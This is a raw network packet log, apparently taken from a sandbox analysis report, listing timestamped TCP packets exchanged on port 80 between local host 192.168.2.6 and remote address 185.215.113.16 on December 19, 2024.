Dec 19, 2024 10:10:12.906516075 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.906595945 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.906634092 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.907519102 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.907562971 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.907691956 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.907731056 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.908591032 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.908632040 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.908703089 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.908742905 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.909586906 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.909626961 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.909691095 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.909727097 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.910476923 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.910517931 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.910582066 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.910628080 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.911444902 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.911484957 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.911633015 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.911664963 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.912506104 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.912552118 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.912595987 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.912636995 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.913506031 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.913547993 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.913655996 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.913695097 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.914486885 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.914546967 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.914593935 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.914644003 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.915425062 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.915477991 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.915524960 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.915560007 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.916440964 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.916486025 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.916524887 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.916563034 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.917479038 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.917519093 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.917584896 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.917623043 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.918550014 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.918591022 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.918636084 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.918678045 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.919470072 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.919514894 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.919559002 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.919600964 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.920424938 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.920465946 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.920525074 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.920564890 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.921482086 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.921525002 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.921612024 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.921650887 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.922414064 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.922455072 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.922482014 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.922518969 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.923394918 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.923443079 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.923496962 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.923557043 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.924377918 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.924417973 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.924494982 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.924534082 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.925455093 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.925498009 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.925632000 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.925673008 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.926369905 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.926412106 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.066915035 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.066976070 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.067218065 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.067267895 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.068342924 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.068388939 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.070487022 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.070503950 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.070521116 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.070535898 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.070538044 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.070554018 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.070564985 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.070578098 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.070606947 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.071283102 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.071327925 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.071623087 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.071664095 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.072551966 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.072594881 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.072701931 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.072738886 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.073513031 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.073558092 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.073657036 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.073702097 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.074599981 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.074618101 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.074651003 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.074665070 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.075432062 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.075475931 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.075622082 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.075658083 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.076282978 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.076325893 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.076458931 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.076507092 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.077158928 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.077199936 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.077327013 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.077367067 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.077996016 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.078037024 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.078178883 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.078216076 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.079121113 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.079160929 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.079262018 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.079299927 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.080092907 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.080147982 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.080276966 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.080331087 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.081232071 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.081248045 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.081274033 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.081286907 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.082360029 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.082398891 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.082534075 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.082573891 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.083532095 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.083570957 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.083719969 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.083758116 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.084548950 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.084592104 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.084837914 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.084875107 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.085470915 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.085511923 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.085664988 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.085705042 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.086503983 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.086544037 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.086668015 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.086705923 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.087353945 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.087400913 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.087518930 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.087560892 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.088413000 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.088428974 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.088464975 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.088478088 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.089308977 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.089332104 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.089374065 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.089391947 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.090090036 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.090106010 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.090143919 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.090157032 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.090843916 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.090893030 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.091002941 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.091041088 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.092036963 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.092053890 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.092088938 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.092114925 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.092935085 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.092988968 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.093106985 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.093147039 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.093974113 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.094019890 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.094158888 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.094199896 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.094986916 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.095037937 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.095155001 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.095201969 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.096183062 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.096198082 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.096226931 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.096244097 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.097254038 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.097304106 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.097438097 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.097476006 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.098068953 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.098117113 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.098244905 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.098283052 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.099083900 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.099102020 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.099139929 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.099169016 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.100027084 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.100071907 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.100182056 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.100220919 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.101188898 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.101206064 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.101233959 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.101253033 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.102277040 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.102294922 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.102323055 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.102339029 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.103149891 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.103214025 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.103308916 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.103352070 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.103933096 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.103981972 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.104111910 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.104155064 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.105031013 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.105047941 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.105077982 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.105093002 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.105931997 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.105979919 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.106090069 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.106129885 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.106897116 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.106942892 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.107011080 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.107054949 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.107357979 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.107398987 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.107402086 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.107439995 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.109764099 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.109823942 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.110301018 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.110347033 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.111131907 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.111177921 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.111289024 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.111324072 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.111465931 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.111485004 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.111509085 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.111511946 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.111524105 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.111530066 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.111555099 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.111573935 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.112174034 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.112215996 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.112309933 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.112350941 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.113034964 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.113080978 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.113125086 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.113167048 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.113804102 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.113851070 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.113884926 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.113925934 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.114624977 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.114669085 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.114805937 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.114852905 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.115796089 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.115838051 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.115874052 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.115914106 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.116617918 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.116657019 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.116693974 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.116731882 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.117511988 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.117554903 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.117630959 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.117671967 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.118681908 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.118726015 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.258630037 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.258651972 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.258671045 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.258693933 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.258713961 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.258740902 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.258780956 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.259601116 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.259646893 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.259649038 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.259684086 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.260585070 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.260633945 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.260730028 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.260768890 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.261508942 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.261554956 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.261571884 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.261617899 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.262537003 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.262578964 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.262615919 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.262660027 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.263700008 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.263741970 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.263803959 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.263839960 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.264800072 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.264843941 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.264899015 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.264936924 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.265731096 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.265772104 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.265798092 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.265837908 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.267057896 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.267100096 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.267188072 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.267226934 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.268285990 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.268330097 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.268374920 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.268413067 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.269480944 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.269526958 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.269572020 CET	80	49860	185.215.113.16	192.168.2.6
